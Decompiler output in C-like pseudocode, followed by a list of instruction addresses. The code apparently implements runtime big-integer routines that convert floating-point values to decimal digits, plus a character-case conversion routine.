										_push( &_v1396);
										_push(_t1061);
										_push( &_v932);
										E01319BDB();
										_t1282 =  &(_t1278[4]);
									}
									_t807 = _v1904;
									_t1088 = 0xa;
									_v1912 = _t1088;
									__eflags = _t807;
									if(_t807 < 0) {
										_t808 =  ~_t807;
										_t809 = _t808 / _t1088;
										_v1880 = _t809;
										_t1089 = _t808 % _t1088;
										_v1884 = _t1089;
										__eflags = _t809;
										if(_t809 == 0) {
											L249:
											__eflags = _t1089;
											if(_t1089 != 0) {
												_t846 =  *(0x13393c4 + _t1089 * 4);
												_v1896 = _t846;
												__eflags = _t846;
												if(_t846 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t846 - 1;
													if(_t846 != 1) {
														_t1100 = _v472;
														__eflags = _t1100;
														if(_t1100 != 0) {
															_t1206 = 0;
															_t1254 = 0;
															__eflags = 0;
															do {
																_t1160 = _t846 *  *(_t1276 + _t1254 * 4 - 0x1d0) >> 0x20;
																 *(_t1276 + _t1254 * 4 - 0x1d0) = _t846 *  *(_t1276 + _t1254 * 4 - 0x1d0) + _t1206;
																_t846 = _v1896;
																asm("adc edx, 0x0");
																_t1254 = _t1254 + 1;
																_t1206 = _t1160;
																__eflags = _t1254 - _t1100;
															} while (_t1254 != _t1100);
															__eflags = _t1206;
															if(_t1206 != 0) {
																_t853 = _v472;
																__eflags = _t853 - 0x73;
																if(_t853 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1276 + _t853 * 4 - 0x1d0) = _t1206;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t809 - 0x26;
												if(_t809 > 0x26) {
													_t809 = 0x26;
												}
												_t1101 =  *(0x133932e + _t809 * 4) & 0x000000ff;
												_v1872 = _t809;
												_v1400 = ( *(0x133932e + _t809 * 4) & 0x000000ff) + ( *(0x133932f + _t809 * 4) & 0x000000ff);
												E01318520(_t1101 << 2,  &_v1396, 0, _t1101 << 2);
												_t864 = E013189A0( &(( &_v1396)[_t1101]), 0x1338a28 + ( *(0x133932c + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x133932f + _t809 * 4) & 0x000000ff) << 2);
												_t1102 = _v1400;
												_t1282 =  &(_t1282[6]);
												_v1892 = _t1102;
												__eflags = _t1102 - 1;
												if(_t1102 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1102 - _v472;
														_t1209 =  &_v1396;
														_t865 = _t864 & 0xffffff00 | _t1102 - _v472 > 0x00000000;
														__eflags = _t865;
														if(_t865 != 0) {
															_t1161 =  &_v468;
														} else {
															_t1209 =  &_v468;
															_t1161 =  &_v1396;
														}
														_v1908 = _t1161;
														__eflags = _t865;
														if(_t865 == 0) {
															_t1102 = _v472;
														}
														_v1876 = _t1102;
														__eflags = _t865;
														if(_t865 != 0) {
															_v1892 = _v472;
														}
														_t1162 = 0;
														_t1256 = 0;
														_v1864 = 0;
														__eflags = _t1102;
														if(_t1102 == 0) {
															L243:
															_v472 = _t1162;
															_t867 = _t1162 << 2;
															__eflags = _t867;
															_push(_t867);
															_t868 =  &_v1860;
															goto L244;
														} else {
															_t1210 = _t1209 -  &_v1860;
															__eflags = _t1210;
															_v1928 = _t1210;
															do {
																_t875 =  *(_t1276 + _t1210 + _t1256 * 4 - 0x740);
																_v1896 = _t875;
																__eflags = _t875;
																if(_t875 != 0) {
																	_t876 = 0;
																	_t1211 = 0;
																	_t1103 = _t1256;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1103 - 0x73;
																		if(_t1103 == 0x73) {
																			goto L258;
																		} else {
																			_t1210 = _v1928;
																			_t1102 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1103 - 0x73;
																			if(_t1103 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1103 - _t1162;
																			if(_t1103 == _t1162) {
																				 *(_t1276 + _t1103 * 4 - 0x740) =  *(_t1276 + _t1103 * 4 - 0x740) & 0x00000000;
																				_t888 = _t876 + 1 + _t1256;
																				__eflags = _t888;
																				_v1864 = _t888;
																				_t876 = _v1888;
																			}
																			_t883 =  *(_v1908 + _t876 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1276 + _t1103 * 4 - 0x740) =  *(_t1276 + _t1103 * 4 - 0x740) + _t883 * _v1896 + _t1211;
																			asm("adc edx, 0x0");
																			_t876 = _v1888 + 1;
																			_t1103 = _t1103 + 1;
																			_v1888 = _t876;
																			_t1211 = _t883 * _v1896 >> 0x20;
																			_t1162 = _v1864;
																			__eflags = _t876 - _v1892;
																			if(_t876 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1211;
																				if(_t1211 == 0) {
																					goto L240;
																				}
																				__eflags = _t1103 - 0x73;
																				if(_t1103 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1103 - _t1162;
																					if(_t1103 == _t1162) {
																						_t558 = _t1276 + _t1103 * 4 - 0x740;
																						 *_t558 =  *(_t1276 + _t1103 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1103 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t881 = _t1211;
																					_t1211 = 0;
																					 *(_t1276 + _t1103 * 4 - 0x740) =  *(_t1276 + _t1103 * 4 - 0x740) + _t881;
																					_t1162 = _v1864;
																					asm("adc edi, edi");
																					_t1103 = _t1103 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1256 - _t1162;
																	if(_t1256 == _t1162) {
																		 *(_t1276 + _t1256 * 4 - 0x740) =  *(_t1276 + _t1256 * 4 - 0x740) & _t875;
																		_t526 = _t1256 + 1; // 0x1
																		_t1162 = _t526;
																		_v1864 = _t1162;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1256 = _t1256 + 1;
																__eflags = _t1256 - _t1102;
															} while (_t1256 != _t1102);
															goto L243;
														}
													} else {
														_t1212 = _v468;
														_v472 = _t1102;
														E01319BDB( &_v468, _t1061,  &_v1396, _t1102 << 2);
														_t1282 =  &(_t1282[4]);
														__eflags = _t1212;
														if(_t1212 == 0) {
															goto L203;
														} else {
															__eflags = _t1212 - 1;
															if(_t1212 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1104 = 0;
																	_v1896 = _v472;
																	_t1257 = 0;
																	__eflags = 0;
																	do {
																		_t897 = _t1212;
																		_t1163 = _t897 *  *(_t1276 + _t1257 * 4 - 0x1d0) >> 0x20;
																		 *(_t1276 + _t1257 * 4 - 0x1d0) = _t897 *  *(_t1276 + _t1257 * 4 - 0x1d0) + _t1104;
																		asm("adc edx, 0x0");
																		_t1257 = _t1257 + 1;
																		_t1104 = _t1163;
																		__eflags = _t1257 - _v1896;
																	} while (_t1257 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1213 = _v1396;
													__eflags = _t1213;
													if(_t1213 != 0) {
														__eflags = _t1213 - 1;
														if(_t1213 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1105 = 0;
																_v1896 = _v472;
																_t1258 = 0;
																__eflags = 0;
																do {
																	_t902 = _t1213;
																	_t1164 = _t902 *  *(_t1276 + _t1258 * 4 - 0x1d0) >> 0x20;
																	 *(_t1276 + _t1258 * 4 - 0x1d0) = _t902 *  *(_t1276 + _t1258 * 4 - 0x1d0) + _t1105;
																	asm("adc edx, 0x0");
																	_t1258 = _t1258 + 1;
																	_t1105 = _t1164;
																	__eflags = _t1258 - _v1896;
																} while (_t1258 != _v1896);
																L208:
																__eflags = _t1104;
																if(_t1104 == 0) {
																	goto L245;
																} else {
																	_t900 = _v472;
																	__eflags = _t900 - 0x73;
																	if(_t900 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E01319BDB( &_v468, _t1061,  &_v2404, 0);
																		_t1282 =  &(_t1282[4]);
																		_t871 = 0;
																	} else {
																		 *(_t1276 + _t900 * 4 - 0x1d0) = _t1104;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t868 =  &_v2404;
														L244:
														_push(_t868);
														_push(_t1061);
														_push( &_v468);
														E01319BDB();
														_t1282 =  &(_t1282[4]);
														L245:
														_t871 = 1;
													}
												}
												L246:
												__eflags = _t871;
												if(_t871 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t849 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t809 = _v1880 - _v1872;
												__eflags = _t809;
												_v1880 = _t809;
											} while (_t809 != 0);
											_t1089 = _v1884;
											goto L249;
										}
									} else {
										_t905 = _t807 / _t1088;
										_v1908 = _t905;
										_t1106 = _t807 % _t1088;
										_v1896 = _t1106;
										__eflags = _t905;
										if(_t905 == 0) {
											L184:
											__eflags = _t1106;
											if(_t1106 != 0) {
												_t1214 =  *(0x13393c4 + _t1106 * 4);
												__eflags = _t1214;
												if(_t1214 != 0) {
													__eflags = _t1214 - 1;
													if(_t1214 != 1) {
														_t906 = _v936;
														_v1896 = _t906;
														__eflags = _t906;
														if(_t906 != 0) {
															_t1259 = 0;
															_t1107 = 0;
															__eflags = 0;
															do {
																_t907 = _t1214;
																_t1168 = _t907 *  *(_t1276 + _t1107 * 4 - 0x3a0) >> 0x20;
																 *(_t1276 + _t1107 * 4 - 0x3a0) = _t907 *  *(_t1276 + _t1107 * 4 - 0x3a0) + _t1259;
																asm("adc edx, 0x0");
																_t1107 = _t1107 + 1;
																_t1259 = _t1168;
																__eflags = _t1107 - _v1896;
															} while (_t1107 != _v1896);
															__eflags = _t1259;
															if(_t1259 != 0) {
																_t910 = _v936;
																__eflags = _t910 - 0x73;
																if(_t910 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1276 + _t910 * 4 - 0x3a0) = _t1259;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t905 - 0x26;
												if(_t905 > 0x26) {
													_t905 = 0x26;
												}
												_t1108 =  *(0x133932e + _t905 * 4) & 0x000000ff;
												_v1888 = _t905;
												_v1400 = ( *(0x133932e + _t905 * 4) & 0x000000ff) + ( *(0x133932f + _t905 * 4) & 0x000000ff);
												E01318520(_t1108 << 2,  &_v1396, 0, _t1108 << 2);
												_t923 = E013189A0( &(( &_v1396)[_t1108]), 0x1338a28 + ( *(0x133932c + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x133932f + _t905 * 4) & 0x000000ff) << 2);
												_t1109 = _v1400;
												_t1282 =  &(_t1282[6]);
												_v1892 = _t1109;
												__eflags = _t1109 - 1;
												if(_t1109 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1109 - _v936;
														_t1217 =  &_v1396;
														_t924 = _t923 & 0xffffff00 | _t1109 - _v936 > 0x00000000;
														__eflags = _t924;
														if(_t924 != 0) {
															_t1169 =  &_v932;
														} else {
															_t1217 =  &_v932;
															_t1169 =  &_v1396;
														}
														_v1876 = _t1169;
														__eflags = _t924;
														if(_t924 == 0) {
															_t1109 = _v936;
														}
														_v1880 = _t1109;
														__eflags = _t924;
														if(_t924 != 0) {
															_v1892 = _v936;
														}
														_t1170 = 0;
														_t1261 = 0;
														_v1864 = 0;
														__eflags = _t1109;
														if(_t1109 == 0) {
															L177:
															_v936 = _t1170;
															_t926 = _t1170 << 2;
															__eflags = _t926;
															goto L178;
														} else {
															_t1218 = _t1217 -  &_v1860;
															__eflags = _t1218;
															_v1928 = _t1218;
															do {
																_t934 =  *(_t1276 + _t1218 + _t1261 * 4 - 0x740);
																_v1884 = _t934;
																__eflags = _t934;
																if(_t934 != 0) {
																	_t935 = 0;
																	_t1219 = 0;
																	_t1110 = _t1261;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1110 - 0x73;
																		if(_t1110 == 0x73) {
																			goto L187;
																		} else {
																			_t1218 = _v1928;
																			_t1109 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1110 - 0x73;
																			if(_t1110 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1110 - _t1170;
																			if(_t1110 == _t1170) {
																				 *(_t1276 + _t1110 * 4 - 0x740) =  *(_t1276 + _t1110 * 4 - 0x740) & 0x00000000;
																				_t947 = _t935 + 1 + _t1261;
																				__eflags = _t947;
																				_v1864 = _t947;
																				_t935 = _v1872;
																			}
																			_t942 =  *(_v1876 + _t935 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1276 + _t1110 * 4 - 0x740) =  *(_t1276 + _t1110 * 4 - 0x740) + _t942 * _v1884 + _t1219;
																			asm("adc edx, 0x0");
																			_t935 = _v1872 + 1;
																			_t1110 = _t1110 + 1;
																			_v1872 = _t935;
																			_t1219 = _t942 * _v1884 >> 0x20;
																			_t1170 = _v1864;
																			__eflags = _t935 - _v1892;
																			if(_t935 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1219;
																				if(_t1219 == 0) {
																					goto L174;
																				}
																				__eflags = _t1110 - 0x73;
																				if(_t1110 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t937 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1110 - _t1170;
																					if(_t1110 == _t1170) {
																						_t370 = _t1276 + _t1110 * 4 - 0x740;
																						 *_t370 =  *(_t1276 + _t1110 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1110 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t940 = _t1219;
																					_t1219 = 0;
																					 *(_t1276 + _t1110 * 4 - 0x740) =  *(_t1276 + _t1110 * 4 - 0x740) + _t940;
																					_t1170 = _v1864;
																					asm("adc edi, edi");
																					_t1110 = _t1110 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1261 - _t1170;
																	if(_t1261 == _t1170) {
																		 *(_t1276 + _t1261 * 4 - 0x740) =  *(_t1276 + _t1261 * 4 - 0x740) & _t934;
																		_t338 = _t1261 + 1; // 0x1
																		_t1170 = _t338;
																		_v1864 = _t1170;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1261 = _t1261 + 1;
																__eflags = _t1261 - _t1109;
															} while (_t1261 != _t1109);
															goto L177;
														}
													} else {
														_t1220 = _v932;
														_v936 = _t1109;
														E01319BDB( &_v932, _t1061,  &_v1396, _t1109 << 2);
														_t1282 =  &(_t1282[4]);
														__eflags = _t1220;
														if(_t1220 != 0) {
															__eflags = _t1220 - 1;
															if(_t1220 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1111 = 0;
																	_v1884 = _v936;
																	_t1262 = 0;
																	__eflags = 0;
																	do {
																		_t955 = _t1220;
																		_t1171 = _t955 *  *(_t1276 + _t1262 * 4 - 0x3a0) >> 0x20;
																		 *(_t1276 + _t1262 * 4 - 0x3a0) = _t955 *  *(_t1276 + _t1262 * 4 - 0x3a0) + _t1111;
																		asm("adc edx, 0x0");
																		_t1262 = _t1262 + 1;
																		_t1111 = _t1171;
																		__eflags = _t1262 - _v1884;
																	} while (_t1262 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t927 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1221 = _v1396;
													__eflags = _t1221;
													if(_t1221 != 0) {
														__eflags = _t1221 - 1;
														if(_t1221 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1112 = 0;
																_v1884 = _v936;
																_t1263 = 0;
																__eflags = 0;
																do {
																	_t962 = _t1221;
																	_t1172 = _t962 *  *(_t1276 + _t1263 * 4 - 0x3a0) >> 0x20;
																	 *(_t1276 + _t1263 * 4 - 0x3a0) = _t962 *  *(_t1276 + _t1263 * 4 - 0x3a0) + _t1112;
																	asm("adc edx, 0x0");
																	_t1263 = _t1263 + 1;
																	_t1112 = _t1172;
																	__eflags = _t1263 - _v1884;
																} while (_t1263 != _v1884);
																L149:
																__eflags = _t1111;
																if(_t1111 == 0) {
																	goto L180;
																} else {
																	_t958 = _v936;
																	__eflags = _t958 - 0x73;
																	if(_t958 < 0x73) {
																		 *(_t1276 + _t958 * 4 - 0x3a0) = _t1111;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t937 =  &_v1396;
																		L188:
																		_push(_t937);
																		_push(_t1061);
																		_push( &_v932);
																		E01319BDB();
																		_t1282 =  &(_t1282[4]);
																		_t930 = 0;
																	}
																}
															}
														}
													} else {
														_t926 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t926);
														_t927 =  &_v1860;
														L179:
														_push(_t927);
														_push(_t1061);
														_push( &_v932);
														E01319BDB();
														_t1282 =  &(_t1282[4]);
														L180:
														_t930 = 1;
													}
												}
												L181:
												__eflags = _t930;
												if(_t930 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t849 =  &_v932;
													L262:
													_push(_t1061);
													_push(_t849);
													E01319BDB();
													_t1282 =  &(_t1282[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t905 = _v1908 - _v1888;
												__eflags = _t905;
												_v1908 = _t905;
											} while (_t905 != 0);
											_t1106 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1201 = _v1920;
									_t1249 = _t1201;
									_t1090 = _v472;
									_v1872 = _t1249;
									__eflags = _t1090;
									if(_t1090 != 0) {
										_t1253 = 0;
										_t1205 = 0;
										__eflags = 0;
										do {
											_t838 =  *(_t1276 + _t1205 * 4 - 0x1d0);
											_t1158 = 0xa;
											_t1159 = _t838 * _t1158 >> 0x20;
											 *(_t1276 + _t1205 * 4 - 0x1d0) = _t838 * _t1158 + _t1253;
											asm("adc edx, 0x0");
											_t1205 = _t1205 + 1;
											_t1253 = _t1159;
											__eflags = _t1205 - _t1090;
										} while (_t1205 != _t1090);
										_v1896 = _t1253;
										__eflags = _t1253;
										_t1249 = _v1872;
										if(_t1253 != 0) {
											_t1099 = _v472;
											__eflags = _t1099 - 0x73;
											if(_t1099 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E01319BDB( &_v468, _t1061,  &_v2404, 0);
												_t1282 =  &(_t1282[4]);
											} else {
												 *(_t1276 + _t1099 * 4 - 0x1d0) = _t1159;
												_v472 = _v472 + 1;
											}
										}
										_t1201 = _t1249;
									}
									_t812 = E013292A0( &_v472,  &_v936);
									_t1151 = 0xa;
									__eflags = _t812 - _t1151;
									if(_t812 != _t1151) {
										__eflags = _t812;
										if(_t812 != 0) {
											_t813 = _t812 + 0x30;
											__eflags = _t813;
											_t1249 = _t1201 + 1;
											 *_t1201 = _t813;
											_v1872 = _t1249;
											goto L282;
										} else {
											_t814 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1249 = _t1201 + 1;
										_t829 = _v936;
										 *_t1201 = 0x31;
										_v1872 = _t1249;
										__eflags = _t829;
										if(_t829 != 0) {
											_t1204 = 0;
											_t1252 = _t829;
											_t1098 = 0;
											__eflags = 0;
											do {
												_t830 =  *(_t1276 + _t1098 * 4 - 0x3a0);
												 *(_t1276 + _t1098 * 4 - 0x3a0) = _t830 * _t1151 + _t1204;
												asm("adc edx, 0x0");
												_t1098 = _t1098 + 1;
												_t1204 = _t830 * _t1151 >> 0x20;
												_t1151 = 0xa;
												__eflags = _t1098 - _t1252;
											} while (_t1098 != _t1252);
											_t1249 = _v1872;
											__eflags = _t1204;
											if(_t1204 != 0) {
												_t833 = _v936;
												__eflags = _t833 - 0x73;
												if(_t833 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E01319BDB( &_v932, _t1061,  &_v2404, 0);
													_t1282 =  &(_t1282[4]);
												} else {
													 *(_t1276 + _t833 * 4 - 0x3a0) = _t1204;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t814 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t814;
									_t1067 = _v1916;
									__eflags = _t814;
									if(_t814 >= 0) {
										__eflags = _t1067 - 0x7fffffff;
										if(_t1067 <= 0x7fffffff) {
											_t1067 = _t1067 + _t814;
											__eflags = _t1067;
										}
									}
									_t816 = _a24 - 1;
									__eflags = _t816 - _t1067;
									if(_t816 >= _t1067) {
										_t816 = _t1067;
									}
									_t757 = _t816 + _v1920;
									_v1916 = _t757;
									__eflags = _t1249 - _t757;
									if(__eflags != 0) {
										while(1) {
											_t757 = _v472;
											__eflags = _t757;
											if(__eflags == 0) {
												goto L303;
											}
											_t1202 = 0;
											_t1250 = _t757;
											_t1094 = 0;
											__eflags = 0;
											do {
												_t817 =  *(_t1276 + _t1094 * 4 - 0x1d0);
												 *(_t1276 + _t1094 * 4 - 0x1d0) = _t817 * 0x3b9aca00 + _t1202;
												asm("adc edx, 0x0");
												_t1094 = _t1094 + 1;
												_t1202 = _t817 * 0x3b9aca00 >> 0x20;
												__eflags = _t1094 - _t1250;
											} while (_t1094 != _t1250);
											_t1251 = _v1872;
											__eflags = _t1202;
											if(_t1202 != 0) {
												_t823 = _v472;
												__eflags = _t823 - 0x73;
												if(_t823 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E01319BDB( &_v468, _t1061,  &_v2404, 0);
													_t1282 =  &(_t1282[4]);
												} else {
													 *(_t1276 + _t823 * 4 - 0x1d0) = _t1202;
													_v472 = _v472 + 1;
												}
											}
											_t822 = E013292A0( &_v472,  &_v936);
											_t1203 = 8;
											_t1067 = _v1916 - _t1251;
											__eflags = _t1067;
											do {
												_t708 = _t822 % _v1912;
												_t822 = _t822 / _v1912;
												_t1156 = _t708 + 0x30;
												__eflags = _t1067 - _t1203;
												if(_t1067 >= _t1203) {
													 *((char*)(_t1203 + _t1251)) = _t1156;
												}
												_t1203 = _t1203 - 1;
												__eflags = _t1203 - 0xffffffff;
											} while (_t1203 != 0xffffffff);
											__eflags = _t1067 - 9;
											if(_t1067 > 9) {
												_t1067 = 9;
											}
											_t1249 = _t1251 + _t1067;
											_v1872 = _t1249;
											__eflags = _t1249 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1249 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1067 = _t1241 & 0x000fffff;
					if((_t1193 | _t1241 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0x13393ec);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1052);
						_t757 = E01320A73();
						if(_t757 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E01321798();
							asm("int3");
							_push(_t1276);
							_t760 = 0xffff;
							__eflags = _v2436 - 0xffff;
							if(_v2436 != 0xffff) {
								E0131AFAE(_t1052,  &_v32, _t1146, _a4);
								_t763 =  *(_v28 + 0xa8);
								__eflags = _t763;
								if(_t763 != 0) {
									_push(1);
									__eflags = _v0 - 0x100;
									if(_v0 >= 0x100) {
										_push( &_v12);
										_push(1);
										_push( &_v0);
										_push(0x100);
										_push(_t763);
										_t764 = E0132CDAD(_t1052,  &_v0);
										__eflags = _t764;
										if(_t764 != 0) {
											_t760 = _v12;
										} else {
											_t765 = _v0;
											goto L326;
										}
									} else {
										_push(_v0);
										_t766 = E01328C40( &_v32);
										__eflags = _t766;
										if(_t766 != 0) {
											_t769 =  *( *((intOrPtr*)(_v28 + 0x94)) + (_v0 & 0x0000ffff)) & 0x000000ff;
										} else {
											_t770 = _v0;
											goto L321;
										}
										goto L323;
									}
								} else {
									_t1075 = _v0;
									__eflags = _t1075 - 0x41 - 0x19;
									if(_t1075 - 0x41 <= 0x19) {
										_t1076 = _t1075 + 0x20;
										__eflags = _t1076;
										_t772 = _t1076 & 0x0000ffff;
										_v16 = _t772;
										_t1075 = _t772;
									}
									_t770 = _t1075 & 0x0000ffff;
									_v16 = _t770;
									L321:
									_t769 = _t770 & 0x0000ffff;
									L323:
									_t765 = _t769 & 0x0000ffff;
									_v16 = _t765;
									L326:
									_t760 = _t765 & 0x0000ffff;
									_v16 = _t760;
								}
								__eflags = _v20;
								if(_v20 != 0) {
									_t1071 = _v32;
									_t743 = _t1071 + 0x350;
									 *_t743 =  *(_t1071 + 0x350) & 0xfffffffd;
									__eflags =  *_t743;
									return _t760;
								}
							}
							return _t760;
						} else {
							L309:
							_t1289 = _v1936;
							if(_v1936 != 0) {
								_t757 = E0132CA9C(_t1067, _t1289,  &_v1944);
							}
							E0131786A();
							return _t757;
						}
					}
				}
			}






































































































































































































































































                            0x0132974e
                            0x01329759
                            0x01329760
                            0x01329763
                            0x01329764
                            0x0132976f
                            0x01329772
                            0x01329778
                            0x0132977e
                            0x01329783
                            0x01329792
                            0x01329794
                            0x01329796
                            0x01329796
                            0x0132979d
                            0x013297a7
                            0x013297ac
                            0x013297af
                            0x013297d3
                            0x013297d7
                            0x013297dc
                            0x013297dd
                            0x013297df
                            0x013297e1
                            0x013297e7
                            0x013297e7
                            0x013297ee
                            0x013297ee
                            0x013297f1
                            0x0132aaa1
                            0x00000000
                            0x013297f7
                            0x013297f7
                            0x013297f7
                            0x013297fa
                            0x0132aa9a
                            0x00000000
                            0x01329800
                            0x01329800
                            0x01329800
                            0x01329803
                            0x0132aa93
                            0x00000000
                            0x01329809
                            0x01329809
                            0x0132980c
                            0x0132aa8c
                            0x00000000
                            0x01329812
                            0x0132981b
                            0x01329823
                            0x01329826
                            0x01329829
                            0x0132982c
                            0x01329832
                            0x0132983a
                            0x01329840
                            0x0132984a
                            0x0132984a
                            0x0132984d
                            0x01329855
                            0x0132985c
                            0x0132985c
                            0x0132984f
                            0x0132984f
                            0x01329851
                            0x01329864
                            0x0132986a
                            0x0132986c
                            0x01329870
                            0x01329875
                            0x01329882
                            0x01329884
                            0x0132988a
                            0x0132988f
                            0x01329890
                            0x01329891
                            0x0132989b
                            0x013298a0
                            0x013298a6
                            0x013298ab
                            0x013298b4
                            0x013298b4
                            0x013298b6
                            0x013298ad
                            0x013298ad
                            0x013298b2
                            0x00000000
                            0x00000000
                            0x013298b2
                            0x013298bc
                            0x013298c4
                            0x013298c6
                            0x013298cf
                            0x013298d0
                            0x013298d6
                            0x013298d8
                            0x01329ccb
                            0x01329cd1
                            0x01329df0
                            0x01329df0
                            0x01329df7
                            0x01329df7
                            0x01329df7
                            0x01329dfe
                            0x01329e01
                            0x01329e08
                            0x01329e08
                            0x01329e03
                            0x01329e03
                            0x01329e03
                            0x01329e0c
                            0x01329e0d
                            0x01329e0f
                            0x01329e12
                            0x01329e15
                            0x01329e18
                            0x01329e1e
                            0x01329e21
                            0x01329e24
                            0x01329e2e
                            0x01329e2e
                            0x01329e2e
                            0x01329e26
                            0x01329e26
                            0x01329e28
                            0x00000000
                            0x01329e2a
                            0x01329e2a
                            0x01329e2a
                            0x01329e28
                            0x01329e30
                            0x01329e32
                            0x01329ed3
                            0x01329ed3
                            0x01329ee0
                            0x01329ee0
                            0x01329ee0
                            0x01329ef6
                            0x01329efb
                            0x01329e38
                            0x01329e38
                            0x01329e3a
                            0x00000000
                            0x01329e40
                            0x01329e42
                            0x01329e43
                            0x01329e45
                            0x01329e47
                            0x01329e47
                            0x01329e49
                            0x01329e4c
                            0x01329e54
                            0x01329e56
                            0x01329e59
                            0x01329e5f
                            0x01329e5f
                            0x01329e61
                            0x01329e6d
                            0x01329e6d
                            0x01329e6d
                            0x01329e63
                            0x01329e65
                            0x01329e65
                            0x01329e74
                            0x01329e77
                            0x01329e79
                            0x01329e80
                            0x01329e80
                            0x01329e7b
                            0x01329e7b
                            0x01329e7b
                            0x01329e88
                            0x01329e92
                            0x01329e98
                            0x01329e99
                            0x01329e9e
                            0x01329ea4
                            0x01329ea7
                            0x00000000
                            0x00000000
                            0x01329ea9
                            0x01329ea9
                            0x01329eb1
                            0x01329eb1
                            0x01329eb7
                            0x01329ebe
                            0x01329ecb
                            0x01329ec0
                            0x01329ec0
                            0x01329ec3
                            0x01329ec3
                            0x01329ebe
                            0x01329e3a
                            0x01329f07
                            0x01329f17
                            0x01329f24
                            0x01329f26
                            0x01329f2d
                            0x01329cd7
                            0x01329cd7
                            0x01329ce0
                            0x01329ce1
                            0x01329ceb
                            0x01329cf1
                            0x01329cf3
                            0x01329cf9
                            0x01329cf9
                            0x01329cfb
                            0x01329cfb
                            0x01329d02
                            0x01329d09
                            0x00000000
                            0x00000000
                            0x01329d0f
                            0x01329d12
                            0x01329d15
                            0x00000000
                            0x01329d17
                            0x01329d17
                            0x01329d17
                            0x01329d17
                            0x01329d1e
                            0x01329d21
                            0x01329d28
                            0x01329d28
                            0x01329d23
                            0x01329d23
                            0x01329d23
                            0x01329d2c
                            0x01329d2f
                            0x01329d31
                            0x01329d33
                            0x01329d39
